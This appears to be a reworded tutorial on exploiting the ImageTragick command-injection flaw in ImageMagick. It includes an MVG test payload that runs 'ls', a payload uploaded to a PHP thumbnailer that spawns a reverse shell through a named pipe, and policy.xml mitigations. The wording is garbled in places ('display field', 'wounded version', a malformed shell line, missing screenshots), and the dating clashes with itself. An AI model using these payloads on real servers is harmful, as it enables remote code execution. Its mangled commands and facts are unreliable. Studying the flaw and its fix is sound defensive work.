Exploiting ImageTragick 2023
This article is about Exploiting ImageTragick .
Information about Exploiting ImageTragick:
This article explains the recently discovered ImageTragick bug and how to find, exploit and fix it.
Overview
A few weeks ago, security researchers Stewie and Nikolay Ermishkin found numerous vulnerabilities in an Open Source Utility called ImageMagick. ImageMagick is software used by a variety of image manipulation applications, from image resizing to image conversion to various formats.
This vulnerability affects all versions below 6.9.3-9. This vulnerability occurs when an insufficiently filtered file name is passed to the delegate command. As detailed in the initial POC, it is very easy to exploit. In this article, we’ll look at how to test and fix this vulnerability.
Related article:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
Am I vulnerable?
Follow these steps to verify the vulnerable version:
Step 1: Enter the following piece of code into a file named exploit.mvg.
push graphic context
display field 0 0 640 480
fill ‘url(https://127.0.0.1/oops.jpg”|ls “-la)’
pop graphic context
Step 2: Now we will try to convert exploit.mvg to exploit.png using the following command.
Convert exploit.mvg exploit.png
If your installed version is vulnerable, it will run “ls –la” and list the contents of the current directory.
We see on the second line; the tool tries to download a file named image.png using curl by making a system call and at the same time found the pipe character and executes our payload further.
Exploitation
To exploit this vulnerability, I created a simple file uploader in PHP containing the following piece of code.
In the highlighted part, we can see that the code will take any image file and create a thumbnail of it.
NOTE: NO MATTER HOW SECURE YOUR FILE UPLOADER IS, IF IT IS USING A WOUNDED VERSION OF IMAGEMAGICK, YOU ARE STILL VULNERABLE AND AT RISK.
Now we will create a PNG file containing the following piece of code and upload it to the server.
push graphic context
display field 0 0 640 480
fill ‘url(https://example.com/image.jpg”|mknod /tmp/pipez p;/bin/sh 0/tmp/pipez;rm -rf “/tmp/pipez)”
pop graphic context
Since in this case our vulnerable machine is installed with the traditional netcat package, we use named pipes to direct the output of system commands to and from the shell.
First, we ran a simple ncat listener on our Kali machine to get a reverse shell.
Further as we hit the upload button, our exploit gets triggered, and we receive a reverse shell.
How to fix it?
The ImageMagick team has shared a workaround for the vulnerable version without the need to update the tool. The original post is published here. It basically says to add the following policies to the policy.xml file.
<policy domain=”coder” rights=”none” pattern=”EPHEMERAL” />
<policy domain=”coder” rights=”none” pattern=”HTTPS” />
<policy domain=”coder” rights=”none” pattern=”MVG” />
<policy domain=”coder” rights=”none” pattern=”MSL” />
<policy domain=”coder” rights=”none” pattern=”TEXT” />
<policy domain=”coder” rights=”none” pattern=”SHOW” />
<policy domain=”coder” rights=”none” pattern=”WIN” />
<policy domain=”coder” rights=”none” pattern=”PLT” />
As seen below, after making changes to the policy.XML file, we are unable to execute the command on the system and the tool throws an error message when we try to convert the malicious file.
